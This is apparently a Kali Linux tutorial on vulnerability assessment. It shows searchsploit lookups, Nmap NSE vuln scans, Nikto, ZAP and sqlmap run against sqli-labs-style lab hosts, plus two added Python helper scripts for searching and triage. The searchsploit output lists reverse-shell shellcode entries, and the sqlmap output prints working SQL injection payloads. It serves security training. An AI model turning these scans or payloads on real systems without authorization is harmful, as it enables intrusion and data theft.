Security vulnerability assessment

Obtaining online and local vulnerability database information

Introduction to online vulnerability databases

  • Websites that collect, analyse and share information about security vulnerabilities:
  • https://nvd.nist.gov
  • https://packetstormsecurity.com
  • https://www.exploit-db.com

Introduction to the local vulnerability database

  • Kali Linux ships with the exploit-db vulnerability database integrated by default so that it can be searched locally. It is installed under /usr/share/exploitdb, which contains exploits (the exploit entries), shellcodes (shellcode), files_exploits.csv (the exploit index) and files_shellcodes.csv (the shellcode index).
┌──(root💀kali)-[~]
└─# ls /usr/share/exploitdb 
exploits  files_exploits.csv  files_shellcodes.csv  shellcodes
  • To make the locally integrated exploit-db database easier to use, Kali Linux provides searchsploit, a tool for quickly looking up security vulnerabilities.
┌──(root💀kali)-[~]
└─# searchsploit                                                                                                                                                                                                                       
  Usage: searchsploit [options] term1 [term2] ... [termN]

========== Examples  ==========
  - Search for Windows local exploits with the keyword afd
  searchsploit afd windows local
  - Search for exploits whose title contains oracle windows
  searchsploit -t oracle windows
  - Search for the exploit whose EDB-ID is 39446
  searchsploit -p 39446
  - Search for linux kernel 3.2, excluding PoC and dos entries
  searchsploit linux kernel 3.2 --exclude="(PoC)|/dos/"
  searchsploit -s Apache Struts 2.0.0
  searchsploit linux reverse password
  searchsploit -j 55555 | json_pp

  For more examples, see the manual: https://www.exploit-db.com/searchsploit

=========  Options  =========
## Search Terms
   -c, --case     [Term]      Perform a case-sensitive search (Default is inSEnsITiVe)
   -e, --exact    [Term]      Perform an EXACT & order match on exploit title (Default is an AND match on each term) [Implies "-t"]
                                e.g. "WordPress 4.1" would not be detect "WordPress Core 4.1")
   -s, --strict               Perform a strict search, so input values must exist, disabling fuzzy search for version range
                                e.g. "1.1" would not be detected in "1.0 < 1.3")
   -t, --title    [Term]      Search JUST the exploit title (Default is title AND the file's path)
       --exclude="term"       Remove values from results. By using "|" to separate, you can chain multiple values
                                e.g. --exclude="term1|term2|term3"

## Output
   -j, --json     [Term]      Show result in JSON format
   -o, --overflow [Term]      Exploit titles are allowed to overflow their columns
   -p, --path     [EDB-ID]    Show the full path to an exploit (and also copies the path to the clipboard if possible)
   -v, --verbose              Display more information in output
   -w, --www      [Term]      Show URLs to Exploit-DB.com rather than the local path
       --id                   Display the EDB-ID value rather than local path
       --colour               Disable colour highlighting in search results

## Non-Searching
   -m, --mirror   [EDB-ID]    Mirror (aka copies) an exploit to the current working directory
   -x, --examine  [EDB-ID]    Examine (aka opens) the exploit using $PAGER

## Non-Searching
   -h, --help                 Show this help screen
   -u, --update               Check for and install any exploitdb package updates (brew, deb & git)

## Automation
       --nmap     [file.xml]  Checks all results in Nmap's XML output with service version
                                e.g.: nmap [host] -sV -oX file.xml

=======
 Notes 
=======
 * You can use any number of search terms
 * By default, search terms are not case-sensitive, ordering is irrelevant, and will search between version ranges
   * Use '-c' if you wish to reduce results by case-sensitive searching
   * And/Or '-e' if you wish to filter results by using an exact match
   * And/Or '-s' if you wish to look for an exact version match
 * Use '-t' to exclude the file's path to filter the search results
   * Remove false positives (especially when searching using numbers - i.e. versions)
 * When using '--nmap', adding '-v' (verbose), it will search for even more combinations
 * When updating or displaying help, search terms will be ignored

  • Example: search for Linux reverse-shell shellcode that requires a password
┌──(root💀kali)-[~]
└─# searchsploit linux reverse password                                                                                                                                                                                            
Exploits: No Results
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Shellcode Title                                                                                                                                                                                         |  Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Linux/ARM - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (S59!) + Null-Free Shellcode (100 bytes)                                                                                             | arm/46736.txt
Linux/ARM - Reverse (192.168.1.1:4444/TCP) Shell (/bin/sh) + Password (MyPasswd) + Null-Free Shellcode (156 bytes)                                                                                       | arm/43778.asm
Linux/x64 - Reverse (10.1.1.4/TCP) Shell + Continuously Probing Via Socket + Port-Range (391-399) + Password (la crips) + Null-Free Shellcode (172 bytes)                                                | linux_x86-64/40079.c
Linux/x64 - Reverse (10.1.1.4:46357/TCP) Shell + Subtle Probing + Timer + Burst + Password (la crips) + Multi-Terminal Shellcode (84/122/172 bytes)                                                      | linux_x86-64/40139.c
Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (104 bytes)                                                                                                      | linux_x86-64/43952.nasm
Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes)                                                                                             | linux_x86-64/39185.c
Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Polymorphic Shellcode (122 bytes)                                                                                           | linux_x86-64/39383.c
Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (136 bytes)                                                                                                         | linux_x86-64/43558.asm
Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free Shellcode (77-85/90-98 bytes)                                                                                     | linux_x86-64/35587.c
Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell + Password (hack) + Polymorphic Shellcode (135 bytes)                                                                                                     | linux_x86-64/39388.c
Linux/x64 - Reverse (192.168.1.9:4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (138 bytes)                                                                                                   | linux_x86-64/43568.asm
Linux/x64 - Reverse (::1:1337/TCP) Shell (/bin/sh) + IPv6 + Password (pwnd) Shellcode (115 bytes)                                                                                                        | linux_x86-64/45039.c
Linux/x86_64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (pass) Shellcode (120 bytes)                                                                                                      | linux_x86-64/47291.c
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
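The following Python script is an added example, not part of the original page or of the exploit-db project: it reimplements the searchsploit matching rules listed in the Notes above (case-insensitive AND match over title and file path, -t to search the title only, -c for case sensitivity, --exclude as a regex with |-separated alternatives, and -p to resolve an EDB-ID to its local path) over a constructed files_exploits.csv sample. The column names id, file and description are assumed to match the real index header; the entries, IDs and paths in the sample are made up.

```python
import csv
import io
import re

# Constructed sample in the shape of /usr/share/exploitdb/files_exploits.csv.
# Assumption: the real index starts with the columns id,file,description,...;
# the IDs, titles and paths below are invented for illustration only.
SAMPLE_INDEX = """id,file,description,date,author,type,platform,port
1001,exploits/windows/local/1001.py,"Example Windows Driver 'afd.sys' - Local Privilege Escalation",2020-01-01,example,local,windows,0
1002,exploits/linux/dos/1002.c,"Example Linux Kernel 3.2 - Denial of Service (PoC)",2020-01-02,example,dos,linux,0
1003,exploits/linux/local/1003.c,"Example Linux Kernel 3.2 - Local Privilege Escalation",2020-01-03,example,local,linux,0
1004,exploits/multiple/remote/1004.rb,"Example Oracle Product - Remote Overflow (Windows)",2020-01-04,example,remote,multiple,0
"""


def load_index(csv_text):
    """Parse the index into a list of dicts keyed by the header row."""
    return list(csv.DictReader(io.StringIO(csv_text)))


def search(rows, terms, title_only=False, case_sensitive=False, exclude=None):
    """searchsploit-style search.

    * every term must match (AND), in any order, as a substring;
    * scope is title AND file path, or the title only with -t;
    * matching is case-insensitive unless -c is given;
    * --exclude is a regular expression (alternatives joined by "|").
    """
    flags = 0 if case_sensitive else re.IGNORECASE
    excl = re.compile(exclude, flags) if exclude else None
    hits = []
    for row in rows:
        haystack = row["description"]
        if not title_only:
            haystack += " " + row["file"]
        if not all(re.search(re.escape(t), haystack, flags) for t in terms):
            continue
        if excl and excl.search(haystack):
            continue
        hits.append(row)
    return hits


def path_for(rows, edb_id, root="/usr/share/exploitdb"):
    """Equivalent of `searchsploit -p <EDB-ID>`: the full local path, or None."""
    for row in rows:
        if row["id"] == str(edb_id):
            return f"{root}/{row['file']}"
    return None


def render(hits):
    """Two-column table like searchsploit's output (title | path)."""
    width = max((len(h["description"]) for h in hits), default=20)
    lines = [f"{'Exploit Title':<{width}} | Path"]
    lines += [f"{h['description']:<{width}} | {h['file']}" for h in hits]
    return "\n".join(lines)


if __name__ == "__main__":
    rows = load_index(SAMPLE_INDEX)
    # searchsploit afd windows local
    print(render(search(rows, ["afd", "windows", "local"])))
    # searchsploit linux kernel 3.2 --exclude="(PoC)|/dos/"
    print(render(search(rows, ["linux", "kernel", "3.2"], exclude="(PoC)|/dos/")))
    # searchsploit -t oracle windows   (title only, so the path is not searched)
    print(render(search(rows, ["oracle", "windows"], title_only=True)))
    # searchsploit -p 1002
    print(path_for(rows, 1002))
```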

Nmap vulnerability scanning

NSE introduction and updating

  • Nmap includes NSE (the Nmap Scripting Engine), which extends Nmap's functionality; much of Nmap's growing capability comes from NSE. See the following link:
    • https://nmap.org/
  • The NSE script database is updated with nmap -script-updatedb.
┌──(root💀kali)-[~]
└─# nmap -script-updatedb                                                                                                                                                                                                              
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-24 09:37 EST
NSE: Updating rule database.
NSE: Script Database updated successfully.
Nmap done: 0 IP addresses (0 hosts up) scanned in 1.20 seconds

Scanning by NSE script category

  • The NSE script engine ships scripts in several categories, and a whole category can be run directly to probe a target.
  • The categories are:
    • auth: scripts that handle authentication credentials (or bypass authentication)
    • broadcast: discover more services on the local network, such as dhcp/dns/sqlserver
    • brute: brute-force attacks against common applications such as http/snmp
    • default: the scripts run by default with -sC or -A, providing basic script-scanning capability
    • discovery: gather more information about the network, such as SMB enumeration and SNMP queries
    • dos: scripts used for denial-of-service attacks
    • exploit: exploit known vulnerabilities to compromise a system
    • external: use third-party databases or resources, for example whois lookups
    • fuzzer: fuzzing scripts that send malformed packets to the target to surface potential vulnerabilities
    • intrusive: intrusive scripts that may be logged or blocked by the target's IDS/IPS
    • malware: check whether the target is infected with malware or has a backdoor open
    • safe: the opposite of intrusive; scripts considered safe
    • version: scripts that enhance service and version detection
    • vuln: check the target for common vulnerabilities, such as MS08-067
  • Use nmap -script <category> <target> to probe one category of information.
  • Use nmap to probe for security vulnerabilities: nmap -script vuln -A -v -T4 <target>
┌──(root💀kali)-[~]
└─# nmap -script vuln -A -v -T4 192.168.10.128                                                                                                                                                                                  
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-24 09:50 EST
NSE: Loaded 149 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 09:50
Completed NSE at 09:50, 10.00s elapsed
Initiating NSE at 09:50
Completed NSE at 09:50, 0.00s elapsed
Initiating ARP Ping Scan at 09:50
Scanning 192.168.10.128 [1 port]
Completed ARP Ping Scan at 09:50, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 09:50
Completed Parallel DNS resolution of 1 host. at 09:50, 0.08s elapsed
Initiating SYN Stealth Scan at 09:50
Scanning 192.168.10.128 [1000 ports]
Discovered open port 80/tcp on 192.168.10.128
Discovered open port 8080/tcp on 192.168.10.128
Discovered open port 22/tcp on 192.168.10.128
Completed SYN Stealth Scan at 09:50, 0.07s elapsed (1000 total ports)
Initiating Service scan at 09:50
Scanning 3 services on 192.168.10.128
Completed Service scan at 09:50, 6.03s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.10.128
NSE: Script scanning 192.168.10.128.
Initiating NSE at 09:50
Completed NSE at 09:55, 313.10s elapsed
Initiating NSE at 09:55
Completed NSE at 09:55, 0.04s elapsed
Nmap scan report for 192.168.10.128
Host is up (0.00045s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| vulners: 
|   cpe:/a:openbsd:openssh:7.4: 
|       EXPLOITPACK:98FE96309F9524B8C84C508837551A19    5.8     https://vulners.com/exploitpack/EXPLOITPACK:98FE96309F9524B8C84C508837551A19    *EXPLOIT*
|       EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97    5.8     https://vulners.com/exploitpack/EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97    *EXPLOIT*
|       EDB-ID:46516    5.8     https://vulners.com/exploitdb/EDB-ID:46516      *EXPLOIT*
|       CVE-2019-6111   5.8     https://vulners.com/cve/CVE-2019-6111
|       SSH_ENUM        5.0     https://vulners.com/canvas/SSH_ENUM     *EXPLOIT*
|       PACKETSTORM:150621      5.0     https://vulners.com/packetstorm/PACKETSTORM:150621      *EXPLOIT*
|       MSF:AUXILIARY/SCANNER/SSH/SSH_ENUMUSERS 5.0     https://vulners.com/metasploit/MSF:AUXILIARY/SCANNER/SSH/SSH_ENUMUSERS  *EXPLOIT*
|       EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0    5.0     https://vulners.com/exploitpack/EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0    *EXPLOIT*
|       EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283    5.0     https://vulners.com/exploitpack/EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283    *EXPLOIT*
|       EDB-ID:45939    5.0     https://vulners.com/exploitdb/EDB-ID:45939      *EXPLOIT*
|       CVE-2018-15919  5.0     https://vulners.com/cve/CVE-2018-15919
|       CVE-2018-15473  5.0     https://vulners.com/cve/CVE-2018-15473
|       CVE-2017-15906  5.0     https://vulners.com/cve/CVE-2017-15906
|       1337DAY-ID-31730        5.0     https://vulners.com/zdt/1337DAY-ID-31730        *EXPLOIT*
|       EDB-ID:45233    4.6     https://vulners.com/exploitdb/EDB-ID:45233      *EXPLOIT*
|       CVE-2020-14145  4.3     https://vulners.com/cve/CVE-2020-14145
|       CVE-2019-6110   4.0     https://vulners.com/cve/CVE-2019-6110
|       CVE-2019-6109   4.0     https://vulners.com/cve/CVE-2019-6109
|       CVE-2018-20685  2.6     https://vulners.com/cve/CVE-2018-20685
|       PACKETSTORM:151227      0.0     https://vulners.com/packetstorm/PACKETSTORM:151227      *EXPLOIT*
|       EDB-ID:46193    0.0     https://vulners.com/exploitdb/EDB-ID:46193      *EXPLOIT*
|       1337DAY-ID-32009        0.0     https://vulners.com/zdt/1337DAY-ID-32009        *EXPLOIT*
|_      1337DAY-ID-30937        0.0     https://vulners.com/zdt/1337DAY-ID-30937        *EXPLOIT*
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.10.128
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.10.128:80/Less-16/
|     Form id: 
|     Form action: 
|     
|     Path: http://192.168.10.128:80/Less-14/
|     Form id: 
|     Form action: 
|     
|     Path: http://192.168.10.128:80/Less-17/
|     Form id: 
|     Form action: 
|     
|     Path: http://192.168.10.128:80/Less-15/
|     Form id: 
|     Form action: 
|     
|     Path: http://192.168.10.128:80/Less-19/
|     Form id: 
|     Form action: 
|     
|     Path: http://192.168.10.128:80/Less-20/
|     Form id: 
|     Form action:  
|     
|     Path: http://192.168.10.128:80/Less-13/
|     Form id: 
|     Form action: 
|     
|     Path: http://192.168.10.128:80/Less-12/
|     Form id: 
|     Form action: 
|     
|     Path: http://192.168.10.128:80/Less-11/
|     Form id: 
|_    Form action: 
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /.git/HEAD: Git folder
|_  /images/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'
| http-git: 
|   192.168.10.128:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|     Remotes:
|_      https://github.com/Audi-1/sqli-labs
|_http-server-header: Apache/2.4.7 (Ubuntu)
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-sql-injection: 
|   Possible sqli for forms:
|     Form at path: /Less-13/, form's action: . Fields that might be vulnerable:
|       uname
|       passwd
|     Form at path: /Less-11/, form's action: . Fields that might be vulnerable:
|       uname
|_      passwd
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
8080/tcp open  http    Apache httpd 2.4.10 ((Debian))
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.10.128
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.10.128:8080/Pass-11/index.php
|     Form id: 
|_    Form action: ?save_path=../upload/
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-fileupload-exploiter: 
|   
|     Couldn't find a file-type field.
|   
|     Couldn't find a file-type field.
|   
|     Couldn't find a file-type field.
|   
|     Couldn't find a file-type field.
|   
|     Couldn't find a file-type field.
|   
|     Couldn't find a file-type field.
|   
|     Couldn't find a file-type field.
|   
|     Couldn't find a file-type field.
|   
|     Couldn't find a file-type field.
|   
|     Couldn't find a file-type field.
|   
|     Failed to upload and execute a payload.
|   
|     Couldn't find a file-type field.
|   
|     Failed to upload and execute a payload.
|   
|     Couldn't find a file-type field.
|   
|_    Failed to upload and execute a payload.
|_http-server-header: Apache/2.4.10 (Debian)
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:70:85:EA (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.429 days (since Tue Feb 23 23:38:45 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: All zeros
TRACEROUTE
HOP RTT     ADDRESS
1   0.45 ms 192.168.10.128
NSE: Script Post-scanning.
Initiating NSE at 09:55
Completed NSE at 09:55, 0.00s elapsed
Initiating NSE at 09:55
Completed NSE at 09:55, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 331.47 seconds
Raw packets sent: 1023 (45.806KB) | Rcvd: 1017 (41.394KB)
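As an added example (not part of the page, of Nmap or of the vulners script), this Python script parses the vulners block of Nmap's normal output, as shown in the scan above, into structured findings and ranks them for triage: entries with a public exploit first, then by score, dropping anything below a threshold. The sample text is a constructed excerpt of the OpenSSH 7.4 block from the scan above; the Finding class and the function names are mine.

```python
import re
from dataclasses import dataclass

# Constructed excerpt of the scan output above (a subset of the vulners entries).
SAMPLE = """\
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| vulners:
|   cpe:/a:openbsd:openssh:7.4:
|       EDB-ID:46516    5.8     https://vulners.com/exploitdb/EDB-ID:46516      *EXPLOIT*
|       CVE-2019-6111   5.8     https://vulners.com/cve/CVE-2019-6111
|       CVE-2018-15473  5.0     https://vulners.com/cve/CVE-2018-15473
|       EDB-ID:45233    4.6     https://vulners.com/exploitdb/EDB-ID:45233      *EXPLOIT*
|       CVE-2018-20685  2.6     https://vulners.com/cve/CVE-2018-20685
|_      1337DAY-ID-30937        0.0     https://vulners.com/zdt/1337DAY-ID-30937        *EXPLOIT*
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.10.128
|_http-server-header: Apache/2.4.7 (Ubuntu)
"""

PORT_RE = re.compile(r"^(\d+/(?:tcp|udp))\s+open\s+(\S+)")
SCRIPT_RE = re.compile(r"^\|_?\s*([A-Za-z0-9-]+):\s*$")      # "| vulners:", "| http-csrf:"
CPE_RE = re.compile(r"^\|_?\s+(cpe:/\S+?):?\s*$")
ENTRY_RE = re.compile(r"^\|_?\s+(\S+)\s+(\d+\.\d+)\s+(https?://\S+)(\s+\*EXPLOIT\*)?\s*$")


@dataclass(frozen=True)
class Finding:
    port: str
    service: str
    cpe: str
    ident: str
    score: float
    url: str
    exploit: bool


def parse_vulners(text):
    """Extract every vulners entry, remembering the port and CPE it belongs to."""
    findings = []
    port = service = cpe = ""
    in_vulners = False
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:                                   # a new port block resets script state
            port, service, in_vulners = m.group(1), m.group(2), False
            continue
        m = SCRIPT_RE.match(line)
        if m:                                   # a script header: only vulners is parsed
            in_vulners = m.group(1) == "vulners"
            continue
        if not in_vulners:
            continue
        m = CPE_RE.match(line)
        if m:
            cpe = m.group(1)
            continue
        m = ENTRY_RE.match(line)
        if m:
            findings.append(Finding(port, service, cpe, m.group(1), float(m.group(2)),
                                    m.group(3), m.group(4) is not None))
    return findings


def triage(findings, min_score=4.0):
    """Rank for remediation: public exploit available first, then score descending."""
    kept = [f for f in findings if f.score >= min_score]
    return sorted(kept, key=lambda f: (not f.exploit, -f.score, f.ident))


def cve_ids(findings):
    """Sorted, de-duplicated CVE identifiers (what a patch ticket should reference)."""
    return sorted({f.ident for f in findings if f.ident.startswith("CVE-")})


if __name__ == "__main__":
    found = parse_vulners(SAMPLE)
    for f in triage(found):
        flag = "EXPLOIT" if f.exploit else "       "
        print(f"{f.port:8} {f.score:4.1f} {flag} {f.ident}  {f.url}")
    print("CVEs:", ", ".join(cve_ids(found)))
```

The same parser runs over a full `nmap -script vuln` report, since port lines and other script headers reset the state; only vulners entries are collected.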

Nikto vulnerability scanning

Introduction

  • Nikto is a scanner that performs comprehensive checks against web servers. It is mainly used to detect server misconfigurations and allowed HTTP methods and to identify web application technologies.
┌──(root💀kali)-[~]
└─# nikto                                     
- Nikto v2.1.6
---------------------------------------------------------------------------
+ ERROR: No host or URL specified
-config+            Use this config file
-Display+           Turn on/off display outputs
-dbcheck            check database and other key files for syntax errors
-Format+            save file (-o) format
-Help               Extended help information
-host+              target host/URL
-id+                Host authentication to use, format is id:pass or id:pass:realm
-list-plugins       List all available plugins
-output+            Write output to this file
-nossl              Disables using SSL
-no404              Disables 404 checks
-Plugins+           List of plugins to run (default: ALL)
-port+              Port to use (default 80)
-root+              Prepend root value to all requests, format is /directory
-ssl                Force ssl mode on port
-Tuning+            Scan tuning
-timeout+           Timeout for requests (default 10 seconds)
-update             Update databases and plugins from CIRT.net
-Version            Print plugin and database versions
-vhost+             Virtual host (for Host header)
+ requires a value
Note: This is the short help output. Use -H for full help text.

Basic Nikto scan

  • Use nikto -h <target> -p <port>.
    • -h sets the target host IP address
    • -p sets the port to probe
┌──(root💀kali)-[~]
└─# nikto -h 192.168.10.128 -p 80
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.10.128
+ Target Hostname:    192.168.10.128
+ Target Port:        80
+ Start Time:         2021-02-24 10:06:54 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /, inode: 1efd, size: 52709f5685e40, mtime: gzip
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3092: /readme: This might be interesting...
+ OSVDB-3092: /readme.txt: This might be interesting...
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /.git/index: Git Index file may contain directory listing information.
+ /.git/HEAD: Git HEAD file found. Full repo details may be present.
+ /.git/config: Git config file found. Infos about repo details may be present.
+ 8725 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time:           2021-02-24 10:07:57 (GMT-5) (63 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

OWASP ZAP vulnerability scanning

Introduction

  • OWASP ZAP (Zed Attack Proxy) is one of the world's most popular free security tools. ZAP can automatically find security vulnerabilities in web applications while you develop and test them. It is also an excellent tool for experienced penetration testers doing manual security testing.
  • Website: https://github.com/zaproxy

Usage

  • Click the icon highlighted in the red box.

  • Enter the target site and click the Attack button.

  • When the attack finishes, the content shown in the figure below appears.

SQLMap vulnerability scanning

Introduction

  • SQLMap is a tool mainly for detecting and exploiting SQL injection in web applications.
┌──(root💀kali)-[~/桌面]
└─# sqlmap                               
___
__H__
___ ___[(]_____ ___ ___  {1.5.2#stable}
|_ -| . ["]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
|_|V...       |_|   http://sqlmap.org
Usage: python3 sqlmap [options]
sqlmap: error: missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, --list-tampers, --wizard, --update, --purge or --dependencies). Use -h for basic and -hh for advanced help

Usage

  • Check whether a URL is vulnerable to SQL injection.
# The environment used here is sqli-labs
┌──(root💀kali)-[~/桌面]
└─# sqlmap -u "192.168.10.131/Less-1?id=1"
___
__H__
___ ___[']_____ ___ ___  {1.5.2#stable}
|_ -| . [']     | .'| . |
|___|_  ["]_|_|_|__,|  _|
|_|V...       |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 05:19:30 /2021-02-26/
[05:19:32] [INFO] testing connection to the target URL
got a 301 redirect to 'http://192.168.10.131/Less-1/?id=1'. Do you want to follow? [Y/n] 
[05:19:37] [INFO] checking if the target is protected by some kind of WAF/IPS
[05:19:37] [INFO] testing if the target URL content is stable
[05:19:37] [WARNING] GET parameter 'id' does not appear to be dynamic
[05:19:38] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[05:19:38] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[05:19:38] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] 
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] 
[05:19:40] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[05:19:40] [WARNING] reflective value(s) found and filtering out
[05:19:40] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable 
[05:19:40] [INFO] testing 'Generic inline queries'
[05:19:40] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[05:19:40] [INFO] GET parameter 'id' is 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)' injectable 
[05:19:40] [INFO] testing 'MySQL inline queries'
[05:19:41] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[05:19:41] [WARNING] time-based comparison requires larger statistical model, please wait.............. (done)                                                                                                                            
[05:19:41] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[05:19:41] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[05:19:41] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[05:19:41] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[05:19:41] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[05:19:41] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[05:19:51] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[05:19:51] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[05:19:51] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[05:19:51] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[05:19:51] [INFO] target URL appears to have 3 columns in query
[05:19:52] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection point(s) with a total of 52 HTTP(s) requests:
---   (if the block below appears, the injection succeeded)
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 4835=4835 AND 'SnrE'='SnrE
Type: error-based
Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
Payload: id=1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x717a767071,(SELECT (ELT(3164=3164,1))),0x7170707071,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'WDxU'='WDxU
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
